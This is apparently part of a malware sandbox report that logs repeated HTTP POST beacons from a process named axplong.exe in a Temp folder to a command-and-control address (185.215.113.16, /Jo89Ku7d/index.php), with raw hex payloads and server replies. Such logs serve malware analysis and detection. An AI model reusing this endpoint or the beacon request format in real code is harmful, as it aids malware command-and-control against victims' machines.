                                                                                                                                                                Sep 27, 2024 17:42:25.128937006 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:25.628432035 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:24 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:25.629648924 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:24 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:25.859296083 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:25 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                18192.168.2.449784185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:25.980649948 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:26.706039906 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:26 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:26.708297014 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:27.003106117 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:26 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                19192.168.2.449787185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:27.129723072 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:27.951656103 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:27 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:27.952778101 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:28.227019072 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:28 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                20192.168.2.449790185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:28.342701912 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:29.073491096 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:28 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:29.074568033 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:29.298993111 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:29 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                21192.168.2.449791185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:29.420056105 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:30.183695078 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:30 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:30.184762001 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:30.460691929 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:30 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                22192.168.2.449794185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:30.580265045 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:31.323282957 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:31 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:31.325284958 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:31.550769091 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:31.624974012 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:31 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:31.844080925 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:31 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                23192.168.2.449797185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:31.967492104 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:32.714004993 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:32 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:32.715043068 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:32.979856968 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:32 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                24192.168.2.449802185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:33.122531891 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:33.378901005 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:33.943217039 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:33 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:33.944351912 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:34.340359926 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:34 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                25192.168.2.449805185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:34.548861027 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:35.274259090 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:35 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:35.275623083 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:35.504559994 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:35 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                26192.168.2.449808185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:35.620328903 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
